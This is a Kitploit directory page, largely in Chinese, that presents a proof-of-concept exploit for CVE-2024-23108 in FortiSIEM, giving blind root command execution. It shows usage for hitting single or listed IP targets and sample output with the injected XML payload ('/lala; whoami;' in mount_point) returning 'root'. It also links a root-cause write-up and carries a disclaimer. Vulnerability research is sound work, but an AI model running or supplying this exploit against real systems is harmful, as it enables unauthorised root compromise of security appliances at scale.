Skip to content
KitploitKITPLOIT
工具漏洞利用博客
Log in
提交
工具漏洞利用博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2024-23108 — CVE-2024-23108 的 POC 迭代,可使用 -l 进行列表输入 | Kitploit
工具/GitHubGitHub/hitem/cve-2024-23108
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试命令与控制红队
GitHubhitem/cve-2024-23108

CVE-2024-23108

CVE-2024-23108 的 POC 迭代,可使用 -l 进行列表输入

查看仓库
5172年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2024-23108 POC

针对存在漏洞的 FortiSIEM 设备,实现盲命令执行并获得 root 权限的概念验证漏洞利用程序。 我只是快速添加了提供 IP 列表的选项,并加入了一些颜色标记。 原版代码(以及全部功劳)归 horizon3 所有(请参见下面的博客文章)。

博客文章

根因分析和入侵指标请参见: https://www.horizon3.ai/attack-research/disclosures/cve-2024-23108-fortinet-fortisiem-2nd-order-command-injection-deep-dive

在 Twitter 上关注 Horizon3.ai 攻击团队,获取最新安全研究:

  • Horizon3 Attack Team
  • James Horseman
  • Zach Hanley

使用方法

python3 CVE-2024-23108.py -h
usage: CVE-2024-23108.py [-h] -t TARGET [-l LIST] [-p PORT] -c COMMAND

options:
  -h, --help            show this help message and exit
  -t TARGET, --target TARGET
                        The IP address of the target
  -l LIST, --list LIST  File containing list of IP addresses
  -p PORT, --port PORT  The port of the Phoenix Monitor service (default: 7900)
  -c COMMAND, --command COMMAND
                        The command to blindly execute

单个目标

python3 CVE-2024-23108.py -t <target_ip> -p <port> -c <command>

多个目标

python3 CVE-2024-23108.py -l <file_path> -p <port> -c <command>

示例:

python3 CVE-2024-23108.py -l iplist.txt -p 7900 -c whoami

[!] Error connecting to 66.77.88.99: timed out
[!] Error connecting to 99.88.77.66: [WinError 10061] No connection could be made because the target machine actively refused it
[!] Error connecting to 88.77.99.66: timed out
[!] Error connecting to 66.77.99.88: timed out
[*] Sending to 77.99.66.88:
<TEST_STORAGE type="nfs">
    <server_ip>127.0.0.1</server_ip>
    <mount_point>/lala; whoami;</mount_point>
</TEST_STORAGE>
[+] Sent to 77.99.66.88!
[+] Received from 77.99.66.88: b'root'

免责声明

本软件纯粹出于学术研究和开发有效防御技术的目的而创建,除非获得明确授权,否则不得用于攻击系统。项目维护者不对软件的滥用承担任何责任。请负责任地使用。

下载工具